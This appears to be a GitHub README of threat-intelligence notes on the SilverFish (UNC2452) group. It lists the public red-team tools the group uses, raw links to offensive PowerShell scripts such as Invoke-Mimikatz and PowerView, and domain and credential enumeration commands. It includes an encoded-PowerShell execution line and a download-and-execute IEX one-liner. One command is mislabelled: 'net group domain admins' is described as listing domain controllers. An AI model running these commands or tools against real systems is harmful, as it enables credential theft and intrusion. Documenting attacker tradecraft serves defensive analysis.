3rkut / SilverFishNotes

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

This is my notes about the SilverFish(UNC2452) Group

The SilverFish Group uses publicly available red teaming tools such as Empire, cobalt strike, koadic loaders, and, in several cases PowerSploit and Mimikatz post exploitation Powershell scripts. Additionally, there are lots of specially crafted Powershell, BAT, CSPROJ, JavaScript and HTA files that are mainly used for enumeration and data exfiltration.


Powershell Direct Links:

  • raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
  • raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
  • raw.githubusercontent.com/device33/PowerView.ps1/master/PowerView.ps1
  • raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1

Most Used Commands:

  • nltest /dclist - > Lists all domain controllers in the domain.

  • nltest /domain_trusts - > Returns a list of trusted domains

  • cmdkey /list - > Displays the list of stored user names and credentials

  • net group ”domain admins” /domain - > Lists all domain controllers in the domain.

  • dir c:\programdata - > Prints the contents of ”programdata” directory (used for enumerating the installed software)

  • powershell -nop -enc %Trimmed...% - > Executes the BASE64 encoded powershell command/script.

Other basic commands:

  • dir "c:\program files"

  • dir "c:\program files (x86)\"

  • dir "c:\ProgramData\"

  • cmd /c powershell -nop exec bypass -c IEX (New-Object Net.WebClient).DownloadString(''); Droller -OperatingSystem server > c:\ProgramData\z_servers.txt

some good resources:



